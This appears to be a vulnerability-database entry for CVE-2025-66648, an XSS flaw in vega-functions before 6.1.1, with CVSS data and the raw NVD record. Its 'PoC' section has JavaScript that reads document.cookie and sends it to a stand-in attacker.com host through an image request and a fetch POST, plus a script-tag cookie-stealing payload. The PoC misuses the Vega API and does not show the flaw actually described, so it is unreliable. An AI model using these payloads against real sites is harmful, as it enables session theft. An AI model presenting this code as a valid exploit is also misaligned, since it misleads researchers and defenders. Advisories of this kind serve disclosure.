Security Vulnerability Report
CVE-2025-66648 CVSS 7.2 HIGH

CVE-2025-66648

Published: 2026-01-05 22:15:51
Last Modified: 2026-02-05 21:27:13

Description

vega-functions provides function implementations for the Vega expression language. Prior to version 6.1.1, for sites that allow users to supply untrusted user input, malicious use of an internal function (not part of the public API) could be used to run unintentional javascript (XSS). This issue is fixed in vega-functions `6.1.1`. There is no workaround besides upgrading. Using `vega.expressionInterpreter` as described in CSP safe mode does not prevent this issue.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Weakness: CWE-79 (Cross-site Scripting)

The 7.2 HIGH score above is the Secondary metric entry in the raw JSON data below. The Primary entry in the same record scores the issue 6.1 MEDIUM with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N; the two assessments differ only in User Interaction (UI:N versus UI:R), which is consistent with the XSS requiring a victim to view the page that renders the untrusted expression.

Configurations (Affected Products)

cpe:2.3:a:vega-functions_project:vega-functions:*:*:*:*:*:node.js:*:* - VULNERABLE
vega-functions < 6.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-66648 XSS PoC for vega-functions < 6.1.1
// This PoC demonstrates how malicious expressions can execute arbitrary JavaScript

// Malicious expression payload
const maliciousExpression = `
  // Attempt to access internal function and execute XSS
  (function(){
    // Steal cookies/session data
    var stolen = document.cookie;
    // Send data to attacker controlled endpoint
    new Image().src = 'https://attacker.com/steal?data=' + encodeURIComponent(stolen);
    // Execute arbitrary code
    eval('alert("XSS via vega-functions CVE-2025-66648")');
  })()
`;

// Example attack vector through vega expression parser
function exploitVegaExpression() {
  const vega = require('vega-functions');
  // User-supplied input containing malicious payload
  const userInput = maliciousExpression;
  try {
    // Parse and execute the malicious expression
    const interpreter = vega.expressionInterpreter;
    const result = interpreter(userInput);
    console.log('Expression executed:', result);
  } catch (e) {
    console.log('Error:', e.message);
  }
}

// Example: Crafting XSS payload for web application using vega
const xssPayload = '<script>\n' +
  'fetch("https://attacker.com/api/steal", {\n' +
  '  method: "POST",\n' +
  '  body: JSON.stringify({cookies: document.cookie})\n' +
  '});\n' +
  '</script>';
// The attacker injects this as user input that gets processed by vega-functions

References

https://github.com/vega/vega/security/advisories/GHSA-m9rg-mr6g-75gm (Vendor Advisory, Exploit)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-66648",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-05T22:15:51.400",
    "lastModified": "2026-02-05T21:27:13.250",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "vega-functions provides function implementations for the Vega expression language. Prior to version 6.1.1, for sites that allow users to supply untrusted user input, malicious use of an internal function (not part of the public API) could be used to run unintentional javascript (XSS). This issue is fixed in vega-functions `6.1.1`. There is no workaround besides upgrading. Using `vega.expressionInterpreter` as described in CSP safe mode does not prevent this issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.7
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:vega-functions_project:vega-functions:*:*:*:*:*:node.js:*:*",
                "versionEndExcluding": "6.1.1",
                "matchCriteriaId": "FED9629A-DA28-4F2E-8E62-E895759E77A0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/vega/vega/security/advisories/GHSA-m9rg-mr6g-75gm",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Vendor Advisory"
        ]
      }
    ]
  }
}